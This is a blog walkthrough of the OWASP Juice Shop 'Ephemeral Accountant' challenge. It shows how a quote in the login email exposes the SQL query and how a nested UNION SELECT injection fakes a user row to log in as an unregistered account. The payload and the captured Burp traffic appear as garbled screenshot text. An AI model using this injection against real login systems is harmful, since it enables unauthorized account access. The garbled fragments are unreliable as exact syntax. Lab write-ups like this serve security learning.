Information Security

Hacking OWASP’s Juice Shop Pt. 51: Ephemeral Accountant

Posted on by codeblue04

Challenge: 

Name: Ephemeral Accountant

Description: Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

Solution Guide

Methodology: 

For the first time in this project, I found a challenge where the expanded description provided me with no ideas about a path forward. With a prohibition on adding the “acc0unt4nt@juice-sh.op” account to the user database table, I was completely stumped. I tried the few injection tricks I knew to no avail. At that point, I allowed myself to read the first bullet point in the challenge solution, which was ” Go to http://localhost:3000/#/login and try logging in with Email ‘ and any Password while observing the Browser DevTools network tab”

Login Email Password Forgot your password? Log in Remember me G Log in with Google Not yet a customer?

While I could have used the browser tools. I opted instead to use Burp Suite and FoxyProxy.

Response Headers Render Pretty Raw Action IX-Frame-options: SAMEORIGIN Feature-policy: payment self' Content -Type: application/ j son; Vary: Accept -Encoding Date: Red, 18 Nov 2020 19:27:21 Connection: close Content -Length: 1285 error" charset=utf GMT 12 31 'SQL ITE ERROR: unrecognized token: \ '721See9c7d9dc229d2921a40e899ecsf\ 'message stack sequelizeDatabaseError: SQL ITE ERROR: unrecognized token: \ " 721 see9c 7d9dc229d2921a40e899ecsf\ Sequel izeDatabaseError" , 'name at Query . formatError ( / juice parent " errno" : I, 'code SQL ITE ERROR" , augmented" :true, 'SELECT FROM original " errno" : I, 'code 'SQL ITE ERROR" , augmented ':true, SELECT FROM SELECT Users Users RHERE email WHERE email AND password AND password AND password 721 see9c7d9dc229d2921a40e899ecsf 721 see9c7d9dc229d2921a40e899ecsf AND deletedAt AND deletedAt IS NULL" IS NULL" FROM Users WHERE email 721See9c7d9dc229d2921a40e899ecsf' AND del etedAt IS NULL"

An md5 hashed space character wasn’t going to provide me with a means of ingress, so remembering that I’m here to learn new things, I grudgingly read the rest of the solution. In that solution, it was revealed that a nested UNION SELECT attack would be required to complete the challenge. Essentially the attack required the creation of an entirely new database table entry, but in a temporary capacity using “UNION SELECT * FROM (<entire fabricated User table entry>)–” as the syntax. So, if I’m correct, the UNION SELECT attack I crafted would create a temporary (some might say ephemeral) table entry without ever interacting with the User table, allowing me to log in a whoever I wanted to be.

email password UNION SELECT FROM ( SELECT 20 AS as 'username , account 4nt@j uice-sh op as email 'test 1234' as password accounting as role 123 as deluxeToken '1.2.3.41 as 'last Loginlp
Request Param s Headers Raw 'Actions POST /rest/user/login HTTP/I.I Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv•78 application/ j son, text/ plain, I/ * Accept Accept -Language: en-lJS, en; q=O.S Accept -Encoding: gzip, deflate Content -Type: application/ j son Content -Length: 446 Origin: http // I Ocal host 3000 Connection: close Referer: http://localhost : 3000/ Response Headers Render Pretty Raw 200 0K "SON web Tokens Actions V O) Geck 10 12 14 Cookle: language=en; welcomebanner status=dismiss; cookl Access-Cont rol -Allow-origin: X-Content -Type-options: nosniff IX-Frame-options: SAMEORIGIN Feature-policy: payment self' Content -Type: application/ j son; charset=utf- Content -Length: a-rag: R,' '331 -SKyH,NcNIRofubcLMRvErSGGC+Rk Vary: Accept -Encoding Date: Red, 18 Nov 2020 Gl•rr Connection: close authentication" email password UNION SELECT FROM (SELECT 20 AS "token 'bid" : 6, 'umail " eyJoeXAioiJKVIQiLCJhbGcioiJsuz11NiJ9.e account 4nt@j uice-sh op'
You successfully solved a challenge: Ephemeral Accountant (Log in with the (non- existing) accountant account4nt@juice-sh.op without ever registering that user.) X

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning:

I’m glad that my first post in this project included the disclaimer that I was going to wind up using the Solution Guide. My inexperience and desire to learn all of this stuff is admittedly tied to my ego, and I don’t like having to admit defeat. It is imperative, however, that I do just that. Failing to suppress that desire would impose significant limitations on my ability to both learn this material and complete this series of walkthroughs. I think this post will be the last time I’ll mention that I’m trying to learn new concepts as opposed to demonstrating mastery. As I clear up the last few four star challenges over the next week and move into the five star category, any further mentioning of my desire to complete challenges without assistance will be detrimental to the quality of the posts, as nearly all of them will require reference to the Solution Guide..

In order to maintain consistency, I’ll still list the Solution Guide in the list of resources used, lest my walkthroughs be mistaken for entirely organic content.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s